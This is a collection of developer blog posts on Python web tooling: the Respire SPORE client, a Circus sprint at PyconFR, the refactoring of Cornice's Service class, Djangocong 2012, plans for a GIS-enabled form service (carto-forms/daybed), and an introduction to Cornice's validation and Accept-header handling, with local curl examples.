Once you have the description of the service, you can write generic clients that consume it!

We first wanted to contribute to spyre, but it was written in a way that didn’t support POSTing data, and it used its own stack to handle HTTP: a lot of code that already exists in other libraries.

While waiting for the train with Rémy, we hacked something together, named “Respire”, a thin layer on top of the awesome Requests library.
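To give an idea of what such a generic client has to do, here is a small sketch that turns one entry of a SPORE-like description into an HTTP method and a URL. It is not Respire's code: the `build_request` helper is invented, the description below is a simplified, hypothetical excerpt, and the paths are assumptions made for this example rather than daybed's real routes.

```python
import re

# Simplified, hypothetical SPORE-like description.
description = {
    "base_url": "http://localhost:8000",
    "methods": {
        "get_data": {"method": "GET", "path": "/data/:model_name"},
        "put_definition": {"method": "PUT", "path": "/definitions/:model_name"},
    },
}


def build_request(description, name, **params):
    """Return the (HTTP method, URL) pair for a described method."""
    spec = description["methods"][name]
    # Replace each ":placeholder" in the path with the matching argument.
    path = re.sub(r":(\w+)", lambda m: str(params[m.group(1)]), spec["path"])
    return spec["method"], description["base_url"].rstrip("/") + path


print(build_request(description, "get_data", model_name="todo"))
```

A client library then only needs to hand the resulting method and URL, together with the payload, to an HTTP library such as Requests.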

We have a first version, feel free to have a look at it and provide enhancements if you feel like it. We’re still hacking on it so it may break (for the better), but it has been working pretty well for us so far.

You can find the project on github, but here is how to use it, really quickly (these examples show how to interact with daybed):

>>> from respire import client_from_url

>>> # create the client from the SPORE definition
>>> cl = client_from_url('http://localhost:8000/spore')

>>> # in daybed, create a new definition
>>> todo_def = {
...    "title": "todo",
...    "description": "A list of my stuff to do",
...    "fields": [
...        {
...            "name": "item",
...            "type": "string",
...            "description": "The item"
...        },
...        {
...            "name": "status",
...            "type": "enum",
...            "choices": [
...                "done",
...                "todo"
...            ],
...            "description": "is it done or not"
...        }
...    ]}
>>> cl.put_definition(model_name='todo', data=todo_def)
>>> cl.post_data(model_name='todo', data=dict(item='make it work', status='todo'))
{u'id': u'9f2c90c0529a442cfdc03c191b022cf7'}
>>> cl.get_data(model_name='todo')

Finally, we were out of cheese so everyone headed back to their respective houses and cities.

Until next time?

Circus sprint at PyconFR

2012-09-17T00:00:00+02:00

From last Thursday to Sunday, Pycon France took place in Paris. It was the opportunity to meet a lot of people and to talk about python awesomeness in general.

We had three tracks this year, plus sprints on the first two days. We sprinted on Circus, the process and socket manager we’re using at Mozilla for some of our setups.

The project gathered some interest, and we ended up with five people working on it. Of course, we spent some time explaining what Circus is and how it was built, and a lot of time talking about use cases and possible improvements, but we also managed to add new features.

Having people wanting to sprint on our projects is exciting because that’s when making things in the open unleashes its full potential. You can’t imagine how happy I was to have some friends come and work on this with us :)

Here is a wrap-up of the sprint:

Autocompletion on the command-line

Remy Hubscher worked on the command-line autocompletion. Now we have a fancy command-line interface which is able to autocomplete if you’re using bash. It seems that not much work is needed to make it happen on zsh as well :)

Have a look at the feature

On the same topic, we now have a cool shell for Circus. If you start the circusctl command without any option, you’ll end up in it. Thanks to Jonathan Dorival for the work on this! You can have a look at the pull request.

Future changes to the web ui

Rachid Belaid had a deep look at the source code and is much more familiar with it now than before. We discussed the possibility of changing the implementation of the web ui, and I’m glad we did. Currently, it’s done with bottle.py and we want to switch to pyramid.

He fixed some issues that were in the tracker, so we now can have the age of watchers in the webui, for instance.

Bug and doc fixing

While reading the source code, we found some inconsistencies and fixed them, with Mathieu Agopian. We also tried to improve the documentation at different levels.

Documentation still needs a lot of love, and I’m planning to spend some time on this shortly. I’ve gathered a bunch of feedback on this.

Circus clustering capabilities

One feature I wanted to work on during this sprint was the clustering abilities of Circus. Nick Pellegrino did an internship on this topic at Mozilla so we spent some time reviewing his pull requests.

A lot of code was written for this so we discussed a bunch of things regarding all of this. It took us more time than expected (and I still need to spend more time on this to provide appropriate feedback), but it allowed us to have a starting-point about what this clustering thing could be.

Remy wrote a good summary about our brainstorming so I’ll not do it again here, but feel free to contact us if you have ideas on this, they’re very welcome!

Project management

We’ve had some feedback telling us that it’s not as easy as it should be to get started with the Circus project. Some of the reasons are that we don’t have any release schedule, and that the documentation is hairy enough to lose people at some point :)

That’s something we’ll try to fix soon :)

PyconFR was a very enjoyable event. I’m looking forward to meeting the community again and discussing how Circus can evolve in ways that are interesting to everyone.

Tarek and I are going to Pycon Ireland, feel free to reach us if you’re going there, we’ll be happy to meet and enjoy beers!

Refactoring Cornice

2012-05-01T00:00:00+02:00

After working for a while with Cornice to define our APIs at Services, it turned out that the current implementation wasn’t flexible enough to allow us to do what we wanted to do.

Cornice started as a toolkit on top of the pyramid routing system, allowing you to register services in a simpler way. Then we added some niceties such as the ability to automatically generate the services documentation or to return the correct HTTP headers as defined by the HTTP specification, without the developer needing to deal with them or even know them.

If you’re not familiar with Cornice, here is how you define a simple service with it:

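from cornice.service import Service

bar = Service(name="bar", path="/bar")

# validators is a sequence of validation callables defined elsewhere
@bar.get(validators=validators, accept='application/json')
def get_drink(request):
    # do something with the request (with moderation).
    # the returned value is a placeholder for this example.
    return {"drink": "water"}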

This external API is quite cool, as it lets you do a bunch of things quite easily. For instance, we wrote our token-server code on top of it in no time.

The burden

The problem with this was that we were mixing internally the service description logic with the route registration one. The way we were doing this was via an extensive use of decorators internally.

The API of the cornice.service.Service class was as follows (simplified so you can get the gist of it):

class Service(object):

    def __init__(self, **service_kwargs):
        # some information, such as the colander schemas (for validation),
        # the defined methods that had been registered for this service and
        # some other things were registered as instance variables.
        self.schemas = service_kwargs.get('schema', None)
        self.defined_methods = []
        self.definitions = []

    def api(self, **view_kwargs):
        """This method is a decorator that is being used by some alias
        methods.
        """
        def wrapper(view):
            # all the logic goes here. And when I mean all the logic, I
            # mean it.
            # 1. we are registering a callback to the pyramid routing
            #    system so it gets called whenever the module using the
            #    decorator is used.
            # 2. we are transforming the passed arguments so they conform
            #    to what is expected by the pyramid routing system.
            # 3. We are storing some of the passed arguments into the
            #    object so we can retrieve them later on.
            # 4. Also, we are transforming the passed view before
            #    registering it in the pyramid routing system so that it
            #    can do what Cornice wants it to do (checking some rules,
            #    applying validators and filters etc.).
            return view
        return wrapper

    def get(self, **kwargs):
        """A shortcut of the api decorator"""
        return self.api(request_method="GET", **kwargs)

I encourage you to go read the entire file on github so you can get a better idea of how all of this was done.

A bunch of things are wrong:

First, we are not separating the description logic from the registration one. This causes problems when we need to access the parameters passed to the service, because the parameters you get are not exactly the ones you passed but the ones that the pyramid routing system is expecting. For instance, if you want to get the view get_drink, you will instead get a decorator which contains this view.
Second, we are using decorators as the APIs we expose. Even if decorators are good as shortcuts, they shouldn’t be the default way to deal with an API. A good example of this is how the resource module consumes this API. This is quite hard to follow.
Third, in the api method, a bunch of things are done regarding inheritance of parameters that are passed to the service or to its decorator methods. This leaves you with a really hard-to-follow path when it comes to adding new parameters to your API.

How do we improve this?

Python is great because it allows you to refactor things in an easy way. What I did doesn’t break our APIs, but makes things way simpler to hack on. One example is that it allowed me to add features that we wanted to bring to Cornice really quickly (a matter of minutes), without touching the API that much.

Here is the gist of the new architecture:

class Service(object):
    # we define class-level variables that will be the default values for
    # this service. This makes things more extensible than it was before.
    renderer = 'simplejson'
    default_validators = DEFAULT_VALIDATORS
    default_filters = DEFAULT_FILTERS

    # we also have some class-level parameters that are useful to know
    # which parameters are supposed to be lists (and so converted as such)
    # or which are mandatory.
    mandatory_arguments = ('renderer',)
    list_arguments = ('validators', 'filters')

    def __init__(self, name, path, description=None, **kw):
        # setup name, path and description as instance variables
        self.name = name
        self.path = path
        self.description = description

        # convert the arguments passed to something we want to store
        # and then store them as attributes of the instance (because they
        # were passed to the constructor)
        self.arguments = self.get_arguments(kw)
        for key, value in self.arguments.items():
            setattr(self, key, value)

        # we keep having the defined_methods list and the list of
        # definitions that are done for this service
        self.defined_methods = []
        self.definitions = []

    def get_arguments(self, conf=None):
        """Returns a dict of arguments. It does all the conversions for
        you, and uses the information that were defined at the instance
        level as fallbacks.
        """

    def add_view(self, method, view, **kwargs):
        """Add a view to this service."""
        # this is really simple and looks a lot like this
        method = method.upper()
        # convert the keyword arguments before storing them
        args = self.get_arguments(kwargs)
        self.definitions.append((method, view, args))
        if method not in self.defined_methods:
            self.defined_methods.append(method)

    def decorator(self, method, **kwargs):
        """This is only another interface to the add_view method, exposing a
        decorator interface"""
        def wrapper(view):
            self.add_view(method, view, **kwargs)
            return view
        return wrapper

So, the service is now only storing the information that’s passed to it and nothing more. No more route registration logic goes here. Instead, I added this as another feature, even in a different module. The function is named register_service_views and has the following signature:

register_service_views(config, service)

To sum up, here are the changes I made:

Service description is now separated from the route registration.
cornice.service.Service now provides an add_view method, which is not a decorator. Decorators are still present but they are optional (you don’t need to use them if you don’t want to).
Everything has been decoupled as much as possible, meaning that you really can use the Service class as a container of information about the services you are describing. This is especially useful when generating documentation.

As a result, it is now possible to use Cornice with other frameworks. It means that you can stick with the service description but plug any other framework on top of it. cornice.service.Service is now only a description tool. To register routes, one would need to read the information contained in this service and inject the right parameters into their preferred routing system.
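As a rough illustration of that last point, here is a self-contained sketch in which a plain dictionary plays the role of a framework’s routing system. The `Service` class below is a minimal stand-in written for this example, not the real Cornice class, and this `register_service_views` only mirrors the signature mentioned above: the real function works on a pyramid configurator.

```python
class Service(object):
    """Minimal stand-in for the description-only Service class."""

    def __init__(self, name, path):
        self.name = name
        self.path = path
        self.definitions = []

    def add_view(self, method, view, **kwargs):
        # Only store the description; nothing is registered here.
        self.definitions.append((method.upper(), view, kwargs))


def register_service_views(routes, service):
    """Read the service description and fill a routing table with it."""
    for method, view, args in service.definitions:
        routes[(method, service.path)] = view
    return routes


def get_drink(request):
    return {"drink": "water"}


bar = Service(name="bar", path="/bar")
bar.add_view("get", get_drink)
routes = register_service_views({}, bar)
```

Here the view stored in the routing table is the very function that was passed in, untouched by any wrapping.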

However, no integration with other frameworks is done at the moment even if the design allows it.

In the same way, the sphinx description layer is now only a consumer of this service description tool: it looks at what’s described and builds the documentation from it.

The resulting branch is not merged yet. Still, you can have a look at it.

Any suggestions are of course welcome :-)

Djangocong 2012

2012-04-16T00:00:00+02:00

This weekend was djangocong, a conference about django, python and the web, held in the south of France, in Carnon-plage, a few kilometres from the beautiful city of Montpellier.

I really enjoyed the three days spent with this bunch of geeks. I was expecting nerds; I found people who really listen, who share values they hold dear, and who don’t limit their conversations to technical matters. Yep, one more prejudice bites the dust :)

As hackers, we have the means to create tools that are useful to everyone, and that can help foster collaboration and the pooling of data. I had the opportunity to discuss projects revolving around mutual aid, whether to connect social and solidarity economy (ESS) organizations or simply so that non-technical people can use the full power of the tool that is the web.

As for the format of the talks, I didn’t quite know what to expect, given the feedback from last year, but it was well suited: 12-minute mini-talks on Saturday morning and early afternoon, in no-wifi mode to restore the quality of listening. And contrary to my expectations, it’s not too short. There were quite a lot of experience reports, and the morning wasn’t really technical, but it sets the scene and lets you find out who does what.

Among all the morning talks, I mainly remember the one by Mathieu Leplatre, “des cartes d’un autre monde” (“maps from another world”), which really amazed me with how easy it is to create maps with TileMill, and which pushes me to reconsider the idea that “mapping is complicated”. The video is (already!) available online, I invite you to watch it (it’s about fifteen minutes) to form your own opinion ;)

Once the talks are over, it stays very interesting, even more so: there is a day and a half left to talk with the other attendees. I got together with Mathieu to discuss “our” “carto forms” project, which finally got redefined a bit more and gave birth to a README. We took the opportunity to choose a new name for it: “daybed”, in reference to couchdb.

This should turn into code shortly. With curiosity helping, we were able to discuss the project with other people and refine everyone’s expectations, to finally arrive at something quite nice.

I also realized that quite a few people use pelican, the piece of code I wrote to generate this blog, and I got useful feedback! There will probably be some thinking to come on how to keep an open-source project from becoming a time sink, and on how to maintain quality in the source code without offending contributors.

Of course, it was also the occasion to meet people we only see on the internets, and to chat a bit about everything that makes our world great and not so great.

Among other notable facts, JMad lost at table football against Exirel, even with me at his side as a distraction (and I’m a player from another world; in other words, I’m terrible), David`bgk didn’t get up to go running on Sunday morning (he had said 5 o’clock!), the Swiss tried to convert me with abricotine, I lost at skulls-n-roses in a few rounds, and we lit a fire at Stéphane’s on Sunday evening (yes, in Montpellier, in mid-April; I’m telling you they lie about their so-called sunshine).

And that’s without mentioning the brasucade…

In short, I can’t wait for the next one (and come on, this time I’ll give a talk!)

Generating forms, geolocated?

2012-04-02T00:00:00+02:00

We have a plan. A crazy one.

Several times, friends have asked me to code the same thing for them, give or take a few details: a web page with a form for submitting geographic information, linked to a map, with ways to filter the information.

The idea has been making its way, and I’m starting to think we can even have something really flexible and useful. I’ve named the project carto-forms for now (but it’s only a code name).

To sum up: what if we had a way to build forms, a bit like Google forms, but with geographic information on top?

If you don’t know Google forms, it’s an easy-to-use interface for generating forms and collecting information from them.

Google forms is a great tool but, in my opinion, lacks two important things: first, it’s a proprietary tool (yes, you can also say freedom-depriving), so it’s not possible to hack it a bit to turn it into what you want, nor to install it on your own server. Second, it doesn’t really know how to work with geographic information, and there is no way to filter the information other than using their spreadsheet system.

After thinking about this for a bit, I contacted Mathieu and my former colleagues at Makina Corpus, since free-software projects involving mapping are likely to interest them.

Imagine the following case:

In a “mapping party”, we choose a particular subject to map and design a form (list of fields (tags) to fill in + description + the type of information);
On site, users fill in the form fields with what they see. Geolocated fields can be filled in automatically using the phone’s geolocation;
At the end of the day, it is possible to see a map of the contributions, with the chosen form;
A script can import the results and publish them to OpenStreetMap.

A few use cases

I can imagine several use cases for this tool. The first one is the one I roughly described above: collaborative map generation, with faceted filters. Here is a general user flow:

An “administrator” goes to the website and creates a new form for all the alternative events. They create the following fields:
- Name: the field that holds the name of the event.
- Category: the category of the event (march, concert, demonstration…). It can be a field with multiple occurrences.
- Location: the location of the event. It can be given either as an address or by selecting a point on a map.
- Date: the date of the event (a “date picker” can make this easy)
Each field in the form has semantic information associated with it (yes/no, multiple selection, date, time, geocoded field, map selection, etc.)
Once done, the form is generated and a URL gives access to it (for example http://forms.notmyidea.org/alternatives).
A REST API lets other applications access the information and add to or modify it.
The URL can now be given to whoever will make good use of it. Anyone can add information. We can also imagine a way to moderate changes if needed.
Of course, the last phase is the most interesting one: the information can be filtered by location, category or date, either through a REST API or through a pretty map and a few well-placed controls, in the browser.
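To make that last filtering step a bit more concrete, here is a minimal sketch in Python. Nothing here exists in carto-forms: the `Event` record, the `filter_events` function and the sample data are all assumptions made up for illustration, and a real service would probably push this work to a database.

```python
from dataclasses import dataclass
from datetime import date


@dataclass
class Event:
    # Hypothetical record shape, mirroring the four fields of the form above.
    name: str
    category: str
    lat: float
    lon: float
    day: date


def filter_events(events, category=None, bbox=None, since=None):
    """Return the events matching every filter that is not None.

    bbox is (min_lat, min_lon, max_lat, max_lon).
    """
    selected = []
    for event in events:
        if category is not None and event.category != category:
            continue
        if since is not None and event.day < since:
            continue
        if bbox is not None:
            min_lat, min_lon, max_lat, max_lon = bbox
            inside = min_lat <= event.lat <= max_lat and min_lon <= event.lon <= max_lon
            if not inside:
                continue
        selected.append(event)
    return selected


# Made-up sample data.
events = [
    Event("Street concert", "concert", 48.11, -1.68, date(2012, 4, 14)),
    Event("Critical mass", "march", 48.85, 2.35, date(2012, 4, 20)),
]
concerts = filter_events(events, category="concert")
around_paris = filter_events(events, bbox=(48.0, 2.0, 49.0, 3.0))
```

The same function could sit behind both the REST API and the map view, since both only need "the records matching these filters".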

You may have noticed that the form creation process is deliberately very simple. The idea is that anyone can create maps easily, in a few clicks. If a well-designed API follows, we can imagine doing server-side validation and even building phone applications quite simply.

To go a bit further, if we manage to come up with a description format for the form, it will be possible to build forms automatically on different platforms, and on generic clients too.

We can imagine quite a few examples for this project: recycling points, accessible places (for wheelchairs etc.), tree identification, good mushroom spots, census of endangered species (Bonelli's eagle is currently tracked using a shared spreadsheet!), tracking of dangerous species (the Asian hornet for instance), mapping advertising billboards, citizen participation (graffiti, potholes, see http://fixmystreet.ca), geocaching, trajectories (hikes, runners, cyclists)…

Here are a few examples where this project could be useful (the list is not exhaustive):

An easy-to-use GIS backend

Say you are a mobile developer. You don't want to burden yourself with PostGIS or write specific code to fetch and insert GIS data! You need Carto-Forms! A simple API helps you think through your models and forms, and that same API lets you insert and retrieve data. You can focus on your application rather than on how geographic data is stored and managed.

In other words, you separate the storage of information from its display.

If you are a django, plomino, drupal etc. developer, you can develop a module to “plug” your models and your user interface into Carto-Forms. That way, forms can be exposed to the users of your back offices. Likewise, it is possible to write widgets that consume data and display it (using, for example, a JavaScript web mapping library).

A visualization tool

Since data can be submitted programmatically through the API, you can use the Carto-forms results page as a visualization tool.

You can explore your dataset using filters on each of the fields. Faceted search could be one way to make this filtering easier. A map displays the result. It feels like sitting in front of a decision support system!

Obviously, the raw data can be downloaded (geojson, xml). Ideally, the best would be to get this filtered data directly from a Web API, with a link to share the page along with the state of the filters and the zoom level / location of the map.

A generic service for managing forms

If you want to generate a configuration file (or whatever you want, email messages, …) you will need a form and a template to inject the data submitted by users and get a result.

A form management service could be useful to create forms programmatically and retrieve “cleaned” and “validated” data.

We can imagine, for instance, an external template system built on carto-forms. It would parse the content of the templates and could bind it to the information users add through a form.

For this particular case, there is no need for geographic information (GIS). This is pretty much the service Google forms currently offers.

Doesn't all of this exist already?

Of course, there is Google forms, which lets you do this kind of thing, but as I said above, it is not exactly the same thing.

We discovered https://webform.com, which lets you create forms with a drag'n'drop system. I would love to reproduce something similar for the user interface. However, this project handles neither API calls nor geolocation information…

The idea behind http://thoth.io is also quite nice: a very simple API to store and retrieve data. On top of that, carto-forms would offer data validation and support for GIS types (point, line, polygon).

http://mapbox.com also does superb work around mapping, but doesn't cover the automatic form generation side…

Shall we get going?!

As you may have realized, this is not an outrageously complex problem. Mathieu and I have talked quite a bit about what we want to do and how. It turns out we can probably get away with an elegant solution without too much trouble. Mathieu is used to working on GIS projects (which is perfect, because I am not) and knows his subject. A good opportunity to learn!

We will both be at Djangocong on April 14 and 15, and we are planning a brainstorming session and a sprint on this project. If you are around and want to chat or lend us a hand, don't hesitate!

We don't know yet whether we will use django or something else. We have thought a bit about CouchDB, its couchapps system and geocouch, but nothing is set in stone yet! Feel free to suggest your solutions or ideas.

Here is the etherpad document we have worked on so far: http://framapad.org/carto-forms. Feel free to edit it and add your comments, that's what it's for!

Thanks to Arnaud for proofreading and fixing a few typos in the text :)

Thoughts about a form generation service, GIS enabled

2012-04-02T00:00:00+02:00

Written by Alexis Métaireau & Mathieu Leplatre

We have a plan. A “fucking good” one.

Friends have asked me, more than once, for pretty much the same thing: a web page with a form, tied to a generated map, with some information filtering. They didn’t ask for it in those words, but that’s the gist of it.

This idea has been stuck in my head since then and I even think that we can come out with something a little bit more flexible and useful. I’ve named it carto-forms for now, but that’s only the “codename”.

To put it shortly: what if we had a way to build forms, à la Google forms, but with geographic information in them?

If you don’t know Google forms, it is a user-friendly way to build forms and to use them to gather information from different users.

In my opinion, Google forms is missing two important things: first, it’s not open-source, so it’s not possible to hack it or even to run it on your own server. Second, it doesn’t really know how to deal with geographic data, and there is no way to filter the information more than in a spreadsheet.

I knew that Mathieu and some folks at Makina Corpus would be interested in this, so I started a discussion with him on IRC and we refined the details of the project and its objectives.

Imagine the following:

For a mapping party, we choose a specific topic to map and design the form (list of fields (i.e. tags) to be filled + description + type of the information) ;
In situ, users fill the form fields with what they see. Geo fields can be pre-populated using device geolocation ;
At the end of the day, we can see a map with all the user contributions entered through this particular form ;
If relevant, a script could then import the resulting dataset and publish it to, or merge it with, OpenStreetMap.

Some use cases

I can see some use cases for this. The first one is a collaborative map, with facet filtering. Let’s draw a potential user flow:

An “administrator” goes to the website and creates a form to list all the alternative-related events. He creates the following fields:
- Name: a plain text field containing the name of the event.
- Category: the category of the event. Can be a finite list.
- Location: The location of the event. It could be provided by selecting a point on a map or by typing an address.
- Date: the date of the event (a datepicker could do the trick)
Each field in the form has semantic information associated with it (yes/no, multiple selection, date-time, geocoding carto, carto selection etc)
Once finished, the form is generated and the user gets an url (say http://forms.notmyidea.org/alternatives) for it.
REST APIs allow third parties to get the form description and to push/edit/get information from there.
He can communicate the address in any way he wants to his community so they can go to the page and add information to it.
Then, it is possible to filter the results per location / date or category. This can be done via API calls (useful for third parties) or via a nice interface in the browser.

So, as you may have noticed, this would allow us to create interactive maps really easily. For users, it’s almost just a matter of a few clicks. If we also come up with a nice Web API for this, we could do server-side validation and even build phone applications easily.

To push the cursor a bit further, if we can come up with a cool description format for the forms, we could even build the forms dynamically on different platforms, with generic clients.
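To give an idea of what such a description format could enable, here is a minimal sketch. The format itself (a plain mapping from field names to type names), the type names and the `validate` function are all assumptions invented for this example; nothing has been decided for carto-forms.

```python
from datetime import date

# Hypothetical description of the "alternatives" form: field name -> type.
FORM = {
    "name": "text",
    "category": "choice",
    "location": "point",
    "date": "date",
}
# Hypothetical finite list of values for the "choice" field.
CHOICES = {"category": ["march", "concert", "demonstration"]}


def validate(form, choices, submission):
    """Return a list of (field, message) problems; an empty list means valid."""
    errors = []
    for field, kind in form.items():
        if field not in submission:
            errors.append((field, "missing"))
            continue
        value = submission[field]
        if kind == "text" and not isinstance(value, str):
            errors.append((field, "expected text"))
        elif kind == "choice" and value not in choices.get(field, []):
            errors.append((field, "unknown choice"))
        elif kind == "point":
            ok = (
                isinstance(value, (list, tuple))
                and len(value) == 2
                and all(isinstance(v, (int, float)) for v in value)
            )
            if not ok:
                errors.append((field, "expected [lon, lat]"))
        elif kind == "date":
            try:
                date.fromisoformat(value)
            except (TypeError, ValueError):
                errors.append((field, "expected YYYY-MM-DD"))
    return errors


good = {
    "name": "Street concert",
    "category": "concert",
    "location": [-1.68, 48.11],
    "date": "2012-04-14",
}
bad = {"name": "Picnic", "category": "picnic", "date": "soon"}
print(validate(FORM, CHOICES, good))
print(validate(FORM, CHOICES, bad))
```

Because the description is plain data, the same document could drive an HTML form, a phone client and the server-side validation.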

As mentioned before, the idea of a simple tool to support collaborative mapping fulfills a recurring need!

We envision a lot of example uses for this: recycling spots, accessible spots (wheelchairs, etc.), tree identification, mushroom picking areas, tracking of endangered species (e.g. Bonelli’s Eagle is currently tracked by sharing a spreadsheet), spotting of dangerous species (e.g. Asian predatory wasps), mapping advertisement boards (most cities do not track them!), citizen reporting (e.g. graffiti, potholes, garbage, lighting, like http://fixmystreet.ca), geocaching, trajectories (e.g. hiking, runners, cyclists)…

Here are some other examples of where carto-forms could be useful:

Simple GIS storage backend

Let’s say you are a mobile developer: you don’t want to bother with PostGIS, nor write custom and insecure code to insert and retrieve your GIS data! You need carto-forms! A simple API helps you design your models/forms, and the same API allows you to CRUD and query your data. Thus, you only need to focus on your application, not on how GIS data will be handled.

We make a distinction between storage and widgets.

Besides, if you are a django / drupal / plomino… maintainer, you can develop a module to “plug” your models (content types) and UI into carto-forms! Carto forms are then exposed to your backoffice users (e.g. drupal admin UI, django adminsite), and likewise you can write your own HTML widgets that consume datasets in frontend views (facets in JSON/XML, and map data in GeoJSON).

Visualization tool

Since data submission can be done programmatically using the API, you could use Carto-forms results page as a visualization tool.

You can explore your dataset content using filters related to each form field. Facet filtering is a great advantage, and a map shows the resulting feature set. You feel like you’re in front of a decision support system!

Of course, filtered raw data can be downloaded (GeoJSON, XML) and a permalink lets you share the page with the state of the filters and the zoom/location of the map.
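For the GeoJSON download, the export could be as small as the sketch below. The `to_geojson` helper and the `(name, lon, lat)` record shape are assumptions for illustration; the only thing taken from the GeoJSON format itself is the `FeatureCollection` / `Feature` / `Point` structure, with coordinates in longitude, latitude order.

```python
import json


def to_geojson(records):
    """Build a GeoJSON FeatureCollection from (name, lon, lat) tuples."""
    features = [
        {
            "type": "Feature",
            # GeoJSON positions are [longitude, latitude], in that order.
            "geometry": {"type": "Point", "coordinates": [lon, lat]},
            "properties": {"name": name},
        }
        for name, lon, lat in records
    ]
    return {"type": "FeatureCollection", "features": features}


# Made-up record, standing in for an already filtered result set.
collection = to_geojson([("Street concert", -1.68, 48.11)])
print(json.dumps(collection, indent=2))
```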

Generic forms service

If you want to generate a configuration file (or whatever, email messages, …), you will need a form and a template to inlay user submitted values and get the result.

A form service would be really useful to create forms programmatically and retrieve cleaned and validated input values.

You could run a dedicated template service based on carto-forms! Parsing a template content, this external service could create a form dynamically and bind them together. The output of the form service (fields => values) would be bound to the input of a template engine (variables => final result).
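Here is a rough sketch of that binding using Python's standard `string.Template`. The template content, the `template_fields` helper and the submitted values are made up for the example; a real service would sit behind the form API rather than a hard-coded dict.

```python
from string import Template

# Hypothetical template for a configuration file.
template = Template("[server]\nhost = $host\nport = $port\n")


def template_fields(tpl):
    """List the placeholder names found in a Template, in order of appearance."""
    names = []
    for match in tpl.pattern.finditer(tpl.template):
        # "named" matches $name, "braced" matches ${name}.
        name = match.group("named") or match.group("braced")
        if name and name not in names:
            names.append(name)
    return names


# 1. Parse the template to know which form fields to create.
fields = template_fields(template)

# 2. Pretend the form service returned these cleaned values (fields => values).
values = {"host": "127.0.0.1", "port": "5000"}

# 3. Feed them to the template engine (variables => final result).
result = template.substitute(values)
print(fields)
print(result)
```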

Note that for this use-case, there is no specific need of GIS data nor storage of records for further retrieval.

What’s out in the wild already?

Of course, there is Google forms, which allows you to do this kind of thing, but it’s closed and not exactly what we are describing here.

We’ve discovered the interesting https://webform.com/ which allows one to create forms with a nice drag-n-drop flow. I would love to reproduce something similar for the user experience. However, the project doesn’t handle APIs and geolocation information.

The idea of http://thoth.io is very attractive: an extremely simple web API to store and retrieve data. In addition, carto-forms would do datatype validation and have basic GIS fields (point, line, polygon).

http://mapbox.com has also done awesome work on cartography, but didn’t take into account the form aspect we’re leveraging here.

So… Let’s make it real!

As you may have understood, this isn’t a really complicated problem. Mathieu and I have been chatting now and then about what we would need and how we could achieve this.

We can probably come up with an elegant solution without too much pain. Mathieu is used to working with GIS systems (which is really cool because I’m not at all) and knows his subject, so that’s an opportunity to learn ;-)

We will be at Djangocong on April 14 and 15 and will probably have a brainstorming session and a sprint on this, so if you are around and want to help us, or just to discuss, feel free to join!

We don’t know yet if we will be using django for this or something else. We have been thinking about couchdb, couchapps and geocouch but nothing is written in stone yet. Comments and proposals are welcome!

Here is the etherpad document we worked on so far: http://framapad.org/carto-forms. Don’t hesitate to add your thoughts and edit it, that’s what it’s made for!

Thanks to Arnaud and Fuzzmz for proof-reading and typo fixing.

Introducing Cornice

2011-12-07T00:00:00+01:00

Wow, already my third working day at Mozilla. Since Monday, I’ve been working with Tarek Ziadé, on a pyramid REST-ish toolkit named Cornice.

Its goal is to take care of the things you usually end up neglecting, so you can focus on what’s important. Cornice gives you facilities for validation of any kind.

The goal is to simplify your work, but we don’t want to reinvent the wheel, so it is easily pluggable with validation frameworks, such as Colander.

Handling errors and validation

Here is how it works:

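from cornice import Service

service = Service(name="service", path="/service")


def is_awesome(request):
    # Validators report problems through request.errors instead of raising.
    if 'awesome' not in request.GET: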
        request.errors.add('query', 'awesome',
                            'the awesome parameter is required')


@service.get(validator=is_awesome)
def get1(request):
    return {"test": "yay!"}

All the errors added during the validation process, or after it, are collected before the response is returned. If there are any, a 400 error is sent back, with the list of problems encountered returned as a nice JSON list (we plan to support multiple formats in the future).

As you might have seen, request.errors.add takes three parameters: location, name and description.

location is where the error is located in the request. It can be “body”, “query”, “headers” or “path”. name is the name of the variable causing the problem, if any, and description contains a more detailed message.
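To make the collect-then-respond idea concrete, here is a tiny stand-alone model of it. This is not Cornice's code: the `Errors` class and the `respond` function are hypothetical stand-ins written for this post, and they only mimic the behaviour described above (collect errors, answer 400 with a JSON list if there are any).

```python
import json


class Errors(list):
    """Hypothetical stand-in for the object exposed as request.errors."""

    def add(self, location, name=None, description=None):
        self.append(
            {"location": location, "name": name, "description": description}
        )


def respond(errors, payload):
    """Return (status, body): 400 plus the error list if any, else 200."""
    if errors:
        return 400, json.dumps(list(errors))
    return 200, json.dumps(payload)


errors = Errors()
errors.add("query", "awesome", "the awesome parameter is required")
status, body = respond(errors, {"test": "yay!"})
print(status, body)
```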

Let’s run this simple service and send some queries to it:

$ curl -v http://127.0.0.1:5000/service
> GET /service HTTP/1.1
> Host: 127.0.0.1:5000
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 400 Bad Request
< Content-Type: application/json; charset=UTF-8
[{"location": "query", "name": "awesome", "description": "the awesome parameter is required"}]

I’ve removed the extra clutter from curl’s output, but you get the general idea.

The content returned is in JSON, and I know exactly what I have to do: add an “awesome” parameter in my query. Let’s do it again:

$ curl "http://127.0.0.1:5000/service?awesome=yeah"
{"test": "yay!"}

Validators can also convert parts of the request and store the converted value in request.validated. It is a standard dict automatically attached to the request.

For instance, in our validator, we can choose to validate the parameter passed and use it in the body of the webservice:

service = Service(name="service", path="/service")


def is_awesome(request):
    if 'awesome' not in request.GET:
        request.errors.add('query', 'awesome',
                            'the awesome parameter is required')
    else:
        request.validated['awesome'] = 'awesome ' + request.GET['awesome']


@service.get(validator=is_awesome)
def get1(request):
    return {"test": request.validated['awesome']}

The output would look like this:

$ curl "http://127.0.0.1:5000/service?awesome=yeah"
{"test": "awesome yeah"}

Dealing with “Accept” headers

The HTTP spec defines an Accept header the client can send so that the response is encoded the right way. A resource, available at a URL, can be available in different formats. This is especially true for web services.

Cornice can help you deal with this. The services you define can tell which Content-Type values they can deal with, and this will be checked against the Accept headers sent by the client.

Let’s refine our previous example a bit, by specifying which content-types are supported, using the accept parameter:

@service.get(validator=is_awesome, accept=("application/json", "text/json"))
def get1(request):
    return {"test": "yay!"}

Now, if you specifically ask for XML, Cornice will throw a 406 with the list of accepted Content-Type values:

$ curl -vH "Accept: application/xml" http://127.0.0.1:5000/service
> GET /service HTTP/1.1
> Host: 127.0.0.1:5000
> Accept: application/xml
>
< HTTP/1.0 406 Not Acceptable
< Content-Type: application/json; charset=UTF-8
< Content-Length: 33
<
["application/json", "text/json"]
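The check behind that 406 can be pictured with the simplified sketch below. It is not how Cornice implements it: `parse_accept` and `negotiate` are hypothetical helpers, and the sketch deliberately ignores quality values (`q=`) and only understands exact types and `type/*` or `*/*` wildcards.

```python
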